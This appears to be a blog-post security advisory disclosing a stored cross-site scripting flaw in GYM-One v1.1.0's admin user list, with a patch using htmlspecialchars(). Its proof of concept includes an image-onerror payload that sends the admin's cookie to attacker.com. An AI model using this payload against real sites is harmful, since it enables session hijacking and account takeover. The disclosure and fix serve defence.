lennart.hostettler@debian:~/posts

12/06/2026 — Security Advisory

CVE-2026-55872 — Stored XSS in GYM-One v1.1.0

Description

GYM-One v1.1.0 is vulnerable to Stored Cross-Site Scripting in admin/users/index.php. The fields firstname, lastname, and email from the users table are rendered directly into HTML without htmlspecialchars() or any output encoding:

echo "<td>" . $row["firstname"] . "</td>"; // line 409
echo "<td>" . $row["lastname"] . "</td>";  // line 410
echo "<td>" . $row["email"];               // line 411

A registered user can inject arbitrary HTML/JavaScript into their profile fields. The payload executes in the browser of any admin who visits /admin/users/.

Proof of Concept

> Step 1 — Inject payload via registration

Register a new user with the following firstname:

<img src=x onerror=alert(1)>

For session hijacking:

<img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)">

> Step 2 — Trigger

Admin navigates to:

GET /admin/users/

Result: The injected script executes in the admin's browser context.

Impact

• Admin session hijacking via cookie exfiltration → full account takeover
• Credential theft by injecting a fake login overlay
• Persistent — payload fires for every admin who opens the user list until the record is deleted

Vendor Response

The maintainer responded the same day the report was submitted, patched the vulnerability promptly, and communicated throughout the process in a professional and solution-oriented manner. This is how coordinated disclosure should work.

Remediation

Wrap all database output in htmlspecialchars() before rendering:

echo "<td>" . htmlspecialchars($row["firstname"], ENT_QUOTES, 'UTF-8') . "</td>";
echo "<td>" . htmlspecialchars($row["lastname"],  ENT_QUOTES, 'UTF-8') . "</td>";
echo "<td>" . htmlspecialchars($row["email"],     ENT_QUOTES, 'UTF-8') . "</td>";